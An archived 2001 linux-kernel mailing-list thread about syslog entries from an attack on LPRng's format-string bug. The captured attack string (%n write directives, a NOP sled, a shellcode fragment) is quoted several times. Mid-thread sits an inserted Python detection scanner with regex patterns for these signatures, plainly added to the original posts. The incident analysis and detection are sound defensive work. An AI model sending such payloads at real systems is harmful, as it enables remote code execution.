* Strange errors in /var/log/messages
From: kernel @ 2001-07-02 16:05 UTC (permalink / raw)
To: linux-kernel; +Cc: Enforcer
Hi!
I'm running RedHat 7.0 with all official RH patches applied. The kernel I
have been running for a few days is 2.2.19-7.0.8.
I run the pre-compiled kernel of RH. Suddenly I got the following messages:
Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
'BBXXXXXXXXXXXXXXXXXX%.176u%3
00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf
<CUT>
Jul 2 15:12:53 gateway SERVER[1152]: Dispatch_input: bad request line
'BBTUVWXXXXXXXXXXXXXXXXXX%.20u%30
0$n%.166u%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf\211
This continued for about half an hour. Then it stopped. What's going on
here??
* Re: Strange errors in /var/log/messages
From: Remco B. Brink @ 2001-07-02 16:11 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
<kernel@ddx.a2000.nu> writes:
> Hi!
>
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> have been running for a few days is 2.2.19-7.0.8.
> I run the pre-compiled kernel of RH. Suddenly I got the following messages:
<snip error messages>
> This continued for about half an hour. Then it stopped. What's going on
> here??
Here you have two options:
You are either under attack by someone who's trying to exploit your
LPRng (someone's trying to use LPR's logging function to get a shell).
This is the LPRng string format _syslog bug that theoretically could
allow root access. For more info check http://www.securityfocus.com/vdb/bottom.html?vid=1712
The other option is that you're under rpc.statd attack at the moment.
In either case, make sure you upgraded to the latest patch versions
and subscribe to BugTraq and the Security Focus Incidents mailing list :)
regards,
Remco
--
Remco B. Brink - SOL Børs A/S systemsdeveloper - http://www.norge-invest.no
Personal site at http://rc6.org - PGP/GnuPG key at http://rc6.org/rbb.pgp
"What you end up with, after running an operating system concept through
these many marketing coffee filters, is something not unlike plain hot
water."
(By Matt Welsh)
* Re: Strange errors in /var/log/messages
From: Alan Cox @ 2001-07-02 16:16 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> have been running for a few days is 2.2.19-7.0.8.
> I run the pre-compiled kernel of RH. Suddenly I got the following messages:
>
> Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
These are for an application. Not sure which or why
* Re: Strange errors in /var/log/messages
From: Richard B. Johnson @ 2001-07-02 17:00 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
On Mon, 2 Jul 2001 kernel@ddx.a2000.nu wrote:
> Hi!
>
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> have been running for a few days is 2.2.19-7.0.8.
> I run the pre-compiled kernel of RH. Suddenly I got the following messages:
>
> Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf
>
> <CUT>
>
> Jul 2 15:12:53 gateway SERVER[1152]: Dispatch_input: bad request line
> 'BBTUVWXXXXXXXXXXXXXXXXXX%.20u%30
> 0$n%.166u%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf\211
>
> This continued for about half an hour. Then it stopped. What's going on
> here??
>
> -
I think you just got 'rooted'. Look at /etc/inetd.conf (if it exists
on your system, the xinetd is more robust). It may have a new entry
on its last line providing a root shell to anybody. This looks somewhat
like an attack shown by CERN about 6 to 12 months ago.
Cheers,
Dick Johnson
Penguin : Linux version 2.4.1 on an i686 machine (799.53 BogoMips).
I was going to compile a list of innovations that could be
attributed to Microsoft. Once I realized that Ctrl-Alt-Del
was handled in the BIOS, I found that there aren't any.
* Re: Strange errors in /var/log/messages
From: Guest section DW @ 2001-07-02 17:42 UTC (permalink / raw)
To: Alan Cox, kernel; +Cc: linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
> > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > have been running for a few days is 2.2.19-7.0.8.
> > I run the pre-compiled kernel of RH. Suddenly I got the following messages:
> >
> > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> These are for an application. Not sure which or why
See CERT Advisory CA-2000-22
http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
"A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format string
vulnerability," which may allow remote users to execute arbitrary code on
vulnerable systems."
* [OT] Re: Strange errors in /var/log/messages
From: Ville Herva @ 2001-07-02 18:23 UTC (permalink / raw)
To: Richard B. Johnson; +Cc: kernel, linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 01:00:33PM -0400, you [Richard B. Johnson] claimed:
> > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> > 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
>
> I think you just got 'rooted'. Look at /etc/inetd.conf (if it exists
> on your system, the xinetd is more robust). It may have a new entry
> on its last line providing a root shell to anybody. This looks somewhat
> like an attack shown by CERN about 6 to 12 months ago.
(This has nothing to do with linux-kernel, sorry...)
I don't think anything particular in that message suggests he actually got
rooted? It just seems that somebody tried to exploit the lprNG hole (or
something else) and the daemon logged that. Of course, it *is* perfectly
possible that he _got_ rooted (although he said he was running redhat-7.0
with all the updates).
(The attacker may have tried other attacks, so if he got rooted, those above
are not necessarily the related log messages. In any case, a 'smart' intruder
would have cleaned the log. Also, a 'smart' attacker probably uses something
more advanced as a backdoor than /etc/inetd.conf these days.)
Or is there something that actually indicates a successful intrusion in the
log snippet that I'm missing?
-- v --
v@iki.fi
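The advisory quoted earlier in the thread names the bug class (a format-string vulnerability in LPRng), and Ville's question is whether the log snippet shows an attempt or a compromise. The following is an added example, not code from the thread or from LPRng: a small Python scanner that reads syslog-style lines and flags the three signatures visible in the quoted entries, namely `%N$n` write directives, `%.Nu` padding directives, and long runs of the octal escape `\220`, which is how syslog renders the non-printable 0x90 byte (an x86 NOP). The sample lines are constructed from the thread's entries and shortened; the parsing regex, the field names and the flagging thresholds are my assumptions, not LPRng's format or any published rule.

```python
"""Flag syslog entries that carry format-string attack signatures.

Added example for the LPRng thread; not code from LPRng or from the list.
Sample lines are constructed from the entries quoted in the thread and
shortened (the real ones ran to hundreds of \\220 bytes).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed syslog layout: "Mon dd HH:MM:SS host prog[pid]: message"
SYSLOG_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[\s:]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
# %N$n (positional) or bare %n: the one printf directive that writes memory.
WRITE_DIRECTIVE = re.compile(r"%\d+\$n|%n")
# %.Nu: precision-padded conversions that set how many bytes %n has counted.
PAD_DIRECTIVE = re.compile(r"%\.\d+u")
# syslog escapes byte 0x90 as \220; a long run of them is a NOP sled.
NOP = r"\220"
NOP_RUN = re.compile(r"(?:\\220)+")

# Constructed sample log (modeled on the thread; counts chosen by me).
SAMPLE_LOG = "\n".join([
    "Jul  2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line "
    "'BBXXXXXXXXXXXXXXXXXX%.176u%300$nsecurity.%301$n%302$n%.192u%303$n"
    + NOP * 40 + r"111F\200\2111f\2111'",
    "Jul  2 15:12:53 gateway SERVER[1152]: Dispatch_input: bad request line "
    "'BBTUVWXXXXXXXXXXXXXXXXXX%.20u%300$n%.166u%301$n%302$n%.192u%303$n"
    + NOP * 32 + r"111F\200\2111f'",
    # A malformed but harmless request: no directives, no sled -> not flagged.
    "Jul  2 15:13:05 gateway SERVER[1160]: Dispatch_input: bad request line "
    "'garbage from a misconfigured print client'",
    "Jul  2 15:14:00 gateway sshd[900]: Accepted password for alice "
    "from 10.0.0.5 port 4021",
])


@dataclass
class Finding:
    timestamp: str
    program: str
    pid: int
    n_writes: int   # %N$n / %n directives seen
    n_pads: int     # %.Nu directives seen
    nop_run: int    # longest run of \220 escapes
    message: str

    @property
    def suspicious(self) -> bool:
        # Any %n is enough on its own: no print request legitimately contains it.
        # Otherwise require the combined pattern (padding plus a sled) or a
        # long sled by itself. Thresholds are assumptions, tune to your logs.
        return (self.n_writes > 0
                or (self.n_pads > 0 and self.nop_run >= 8)
                or self.nop_run >= 16)


def analyse_line(line: str) -> Optional[Finding]:
    """Parse one syslog line into a Finding; None if it is not syslog-shaped."""
    m = SYSLOG_LINE.match(line)
    if not m:
        return None
    msg = m.group("msg")
    runs = [len(r.group(0)) // len(NOP) for r in NOP_RUN.finditer(msg)]
    return Finding(
        timestamp=m.group("ts"), program=m.group("prog"), pid=int(m.group("pid")),
        n_writes=len(WRITE_DIRECTIVE.findall(msg)),
        n_pads=len(PAD_DIRECTIVE.findall(msg)),
        nop_run=max(runs, default=0),
        message=msg,
    )


def scan_log(text: str) -> List[Finding]:
    """Return only the suspicious findings, in log order."""
    hits = []
    for line in text.splitlines():
        f = analyse_line(line)
        if f is not None and f.suspicious:
            hits.append(f)
    return hits


def summarize(findings: List[Finding]) -> dict:
    """Triage view: how many attempts, from which daemon/PIDs, over what window.
    A request the daemon rejected as a 'bad request line' is evidence of an
    attempt, not of success, so this reports attempts and nothing more."""
    return {
        "flagged": len(findings),
        "programs": sorted({f.program for f in findings}),
        "pids": [f.pid for f in findings],
        "first": findings[0].timestamp if findings else None,
        "last": findings[-1].timestamp if findings else None,
    }


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.timestamp} {h.program}[{h.pid}]: %n x{h.n_writes}, "
              f"%.Nu x{h.n_pads}, NOP run {h.nop_run}")
    print(summarize(found))
```

Run it directly to print the flagged entries and a triage summary; point `scan_log` at the contents of /var/log/messages to use it on a real file. The summary deliberately counts attempts rather than declaring a compromise: a line that LPRng logged as a rejected "bad request line" shows the parser refused the input, and whether the daemon was actually vulnerable has to be settled from the host (the installed LPRng version against the advisory, what is listening, changes to inetd.conf or xinetd.d), not from this log alone.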
* Re: Strange errors in /var/log/messages
From: kernel @ 2001-07-02 19:51 UTC (permalink / raw)
To: Guest section DW; +Cc: Alan Cox, linux-kernel, Enforcer
On Mon, 2 Jul 2001, Guest section DW wrote:
> On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
>
> > > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > > have been running for a few days is 2.2.19-7.0.8.
> > > I run the pre-compiled kernel of RH. Suddenly I got the following messages:
> > >
> > > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
>
> > These are for an application. Not sure which or why
>
> See CERT Advisory CA-2000-22
> http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
>
> "A popular replacement software package to the BSD lpd printing service
> called LPRng contains at least one software defect, known as a "format string
> vulnerability," which may allow remote users to execute arbitrary code on
> vulnerable systems."
I just read the article. It seems somebody tried to exploit a bug in
LPRng. Unfortunately I didn't check the TCP/IP connections at the time of
the attack (with netstat), so I couldn't tell who was connected to port 515.
The article suggests upgrading to 3.6.25. I'm currently running 3.7.4-23.
I assume I'm not vulnerable, but those 'errors' in the logfile really
scared the heck out of me! :) To be certain, I just blocked port 515 for
outbound connections. :)
By the way, sorry this message was off-topic, but I didn't know it was an
LPRng issue, not a kernel issue.
Thanks!
* Re: Strange errors in /var/log/messages
From: David Weinehall @ 2001-07-03 7:45 UTC (permalink / raw)
To: kernel; +Cc: Guest section DW, Alan Cox, linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 09:51:44PM +0200, kernel@ddx.a2000.nu wrote:
> On Mon, 2 Jul 2001, Guest section DW wrote:
>
> > On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
> >
> > > > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > > > have been running for a few days is 2.2.19-7.0.8.
> > > > I run the pre-compiled kernel of RH. Suddenly I got the following messages:
> > > >
> > > > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > > > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > > > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> >
> > > These are for an application. Not sure which or why
> >
> > See CERT Advisory CA-2000-22
> > http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
> >
> > "A popular replacement software package to the BSD lpd printing service
> > called LPRng contains at least one software defect, known as a "format string
> > vulnerability," which may allow remote users to execute arbitrary code on
> > vulnerable systems."
>
> I just read the article. It seems somebody tried to exploit a bug in
> LPRng. Unfortunately I didn't check the TCP/IP connections at the time of
> the attack (with netstat), so I couldn't tell who was connected to port 515.
> The article suggests upgrading to 3.6.25. I'm currently running 3.7.4-23.
> I assume I'm not vulnerable, but those 'errors' in the logfile really
> scared the heck out of me! :) To be certain, I just blocked port 515 for
> outbound connections. :)
>
> By the way, sorry this message was off-topic, but I didn't know it was an
> LPRng issue, not a kernel issue.
A good idea is to block all ports, then open only those you know need to
be open. Paranoia is good.
/David
_ _
// David Weinehall <tao@acc.umu.se> /> Northern lights wander \\
// Project MCA Linux hacker // Dance across the winter sky //
\> http://www.acc.umu.se/~tao/ </ Full colour fire </